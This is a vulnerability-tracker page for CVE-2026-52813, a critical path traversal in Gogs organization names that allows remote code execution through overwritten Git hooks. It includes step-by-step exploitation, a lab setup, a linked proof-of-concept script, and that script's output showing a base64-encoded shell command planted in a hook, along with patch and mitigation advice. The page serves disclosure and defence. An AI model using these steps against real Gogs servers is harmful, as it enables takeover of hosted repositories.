Skip to main content

Gogs EUVD-2026-39084

| CVE-2026-52813 CRITICAL
Relative Path Traversal (CWE-23)
2026-06-23 https://github.com/gogs/gogs GHSA-c39w-43gm-34h5
Docker RCE PostgreSQL Path Traversal
10.0
CVSS 3.1 · Vendor: https://github.com/gogs/gogs
Share

Severity by source

Vendor (https://github.com/gogs/gogs) PRIMARY
10.0 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Network API, low complexity, scope-changing RCE as git user; PR:L because exploitation needs an account able to create an org (self-registration default but configurable).

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (https://github.com/gogs/gogs).

CVSS VectorVendor: https://github.com/gogs/gogs

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 23, 2026 - 17:34 vuln.today
Analysis Generated
Jun 23, 2026 - 17:34 vuln.today
CVE Published
Jun 23, 2026 - 17:10 github-advisory
CRITICAL 10.0

DescriptionCVE.org

Summary

Organization names containing path traversal sequences (../) are accepted by Gogs, and repositories under them are written to paths following these path traversals. This allows storing/retrieving data for repositories at arbitrary locations on the filesystem. By creating nested structure of Git repositories, one can overwrite the other's hooks configuration to result in Remote Code Execution (RCE).

Details

During organization creation, internal/database/org.go calls os.MkdirAll(repox.UserPath(org.Name)) without sanitizing org.Name.

https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/database/org.go#L165

Repository creation uses this name to decide where to write the Git bare repository's (org/name.git). By setting the org name to ../../../../tmp/test, and creating a repository under that organization, it gets written under /tmp/test on the server.

https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/repox/repox.go#L57-L58

An attacker can abuse this in a clever way by writing to the /data/gogs/data/tmp/local-r/1 directory, being a local worktree of the git repositories inside of Gogs. These directories are editable by Git. By creating a repository nested inside of there, files like config and hooks/update are now referenced through the path traversal, and are editable by Git. This allows the attacker to edit the hooks/update script with malicious Bash commands and then to trigger the hook.

The steps to exploit this inside of Gogs are roughly (ignoring some syncing dummy actions):

  1. Create regular outer repository and get its ID
  2. Create organization named ../../../../data/gogs/data/tmp/local-r/{ID}/nested
  3. Create a repository inside this organization (eg. rce), which will be written into the local clone of the outer repository
  4. From the outer repository, edit nested/rce.git/hooks/update to contain malicious shell commands
  5. Interact with the rce repository again to trigger the updated hook, and RCE is achieved

PoC

  1. Set up a default Gogs instance by saving the following content to docker-compose.yml and running docker compose up:
yml
services:
  db:
    image: postgres:16-alpine
    environment:
      POSTGRES_USER: gogs
      POSTGRES_PASSWORD: gogs
      POSTGRES_DB: gogs
    volumes:
      - postgres-data:/var/lib/postgresql/data
    restart: unless-stopped
    healthcheck:
      test: [ "CMD-SHELL", "pg_isready -U gogs -d gogs" ]
      interval: 5s
      timeout: 5s
      retries: 5

  gogs:
    image: gogs/gogs
    depends_on:
      db:
        condition: service_healthy
    ports:
      - "3000:3000"
    volumes:
      - gogs-data:/data
    restart: unless-stopped

volumes:
  gogs-data:
  postgres-data:
  1. Visit http://localhost:3000, set the *Host* to db:5432 and *Password* to gogs. Under *Admin Account Settings* configure your admin account
  2. As the attacker, register an account with username attacker and password attacker at http://localhost:3000/user/sign_up
  3. As the attacker, run the following script (in gist to avoid cluttering this advisory):

https://gist.github.com/JorianWoltjer/4b72063338b27140f4439c524d98f2b9

The output should look like:

shell
$ python3 gogs-rce.py
step 1 token ok
step 2 create personal repo 201 full_name attacker/writer-bd426045
step 3 web editor new file on attacker / writer-bd426045
step 4 GET writer repo -> local-r 1
step 5 create org 201 local-r 1 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 6 get org 200 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 7 create repo 201 full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 html_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 clone_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7.git
step 8 get repo 200 owner.username ../../../../data/gogs/data/tmp/local-r/1/nested full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 empty False
Cloning into '/tmp/poc-writer-fy4k5064'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Unpacking objects: 100% (6/6), 491 bytes | 491.00 KiB/s, done.
step 9 clone writer repo -> /tmp/poc-writer-fy4k5064
[master 3cf84b2] poc: nested/rce-b175aca7.git hook path
 1 file changed, 1 insertion(+)
 create mode 100755 nested/rce-b175aca7.git/hooks/update
step 10 write nested/rce-b175aca7.git/hooks/update with echo 'aWQ=' | base64 -d | bash > pwned
Enumerating objects: 7, done.
Counting objects: 100% (7/7), done.
Delta compression using up to 14 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (6/6), 1022 bytes | 1022.00 KiB/s, done.
Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
To http://localhost:3000/attacker/writer-bd426045.git
   b0b9886..3cf84b2  master -> master
step 11 push writer
step 12 API new file on attacker / writer-bd426045
step 13 API new file on org ../../../../data/gogs/data/tmp/local-r/1/nested / rce-b175aca7
step 14 API new file on attacker / writer-bd426045
step 15 GET raw pwned 200 http://localhost:3000/attacker/writer-bd426045/raw/master/nested/rce-b175aca7.git/pwned

=== COMMAND OUTPUT ===
uid=1000(git) gid=1000(git) groups=1000(git)

Impact

In the default setting, users can self-register and then create their own organizations. From here they can perform this exploit to achieve RCE as the git user.

Articles & Coverage 1

News Critical RCE in Gogs Self-Hosted Git Service before 0.14.3 - CVE-2026-52813 Jun 23, 2026

AnalysisAI

Remote code execution in Gogs self-hosted Git service before 0.14.3 allows unauthenticated attackers (where self-registration is enabled) to abuse unsanitized organization names containing '../' sequences to write Git repository files outside the intended storage root, then overwrite a repository's hooks/update script and trigger arbitrary command execution as the git user. The flaw carries a CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C) rating, and a fully working public proof-of-concept is published alongside the GHSA advisory, though no CISA KEV listing or EPSS data is provided in the input.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Self-register account on exposed Gogs
Delivery
Create outer personal repository and note its ID
Exploit
Create organization with '../../../../data/gogs/data/tmp/local-r/{ID}/nested' name
Install
Create nested repo writing into outer repo's local worktree
C2
Push commit overwriting nested .git/hooks/update with shell payload
Execute
Trigger Git operation invoking the hook
Impact
Command execution as git user
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires (1) network reachability to the Gogs HTTP API, (2) an account that can create an organization and a repository - by default Gogs allows self-registration so this is effectively unauthenticated, but if an administrator has set DISABLE_REGISTRATION=true or restricted org creation, the attacker needs a low-privileged account with org-create rights, and (3) a Gogs version earlier than 0.14.3. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment All available signals point to a top-priority issue. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario Using the published PoC (gist linked from GHSA-c39w-43gm-34h5), an attacker self-registers on an internet-exposed Gogs instance, creates a normal personal repository, then creates an organization whose name is a path-traversal string pointing at that repository's server-side local worktree (data/gogs/data/tmp/local-r/<id>/nested) and creates a nested repo inside it. From the outer repo they commit a malicious nested/<repo>.git/hooks/update script and trigger a subsequent server-side Git operation, executing arbitrary commands as the git user with access to all hosted repositories.
Remediation Vendor-released patch: upgrade to Gogs 0.14.3 or later, which adds pathx.Clean() sanitization to repox.UserPath/RepoPath and enforces AlphaDashDot/MaxSize(35) validation on organization usernames in the API (see commit f6acd467305943aae8403cbac81f0118dd1235d7 and PR https://github.com/gogs/gogs/pull/8334, release notes at https://github.com/gogs/gogs/releases/tag/v0.14.3, advisory https://github.com/gogs/gogs/security/advisories/GHSA-c39w-43gm-34h5). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Disable self-registration in Gogs settings as an interim measure while patching is completed. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-54350 CRITICAL
10.0 Jun 23

Unauthenticated NoSQL operator injection in Budibase self-hosted server (@budibase/server <= 3.39.0) allows anonymous vi
CVE-2026-52806 CRITICAL
9.9 Jun 23

Remote code execution in Gogs through 0.14.2 allows authenticated users (and unauthenticated attackers on default-config
CVE-2026-55454 CRITICAL
9.9 Jun 24

Reverse-proxy takeover in Appsmith versions prior to 2.1 lets an authenticated low-privileged user abuse server-side req
CVE-2026-54352 CRITICAL
9.6 Jun 22

Arbitrary file read in Budibase self-hosted server (@budibase/server <= 3.39.0) allows an authenticated workspace builde
CVE-2026-56265 CRITICAL
9.3 Jun 21

Authentication bypass in Crawl4AI Docker API server (versions prior to 0.8.7) allows remote unauthenticated attackers to

Share

EUVD-2026-39084 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy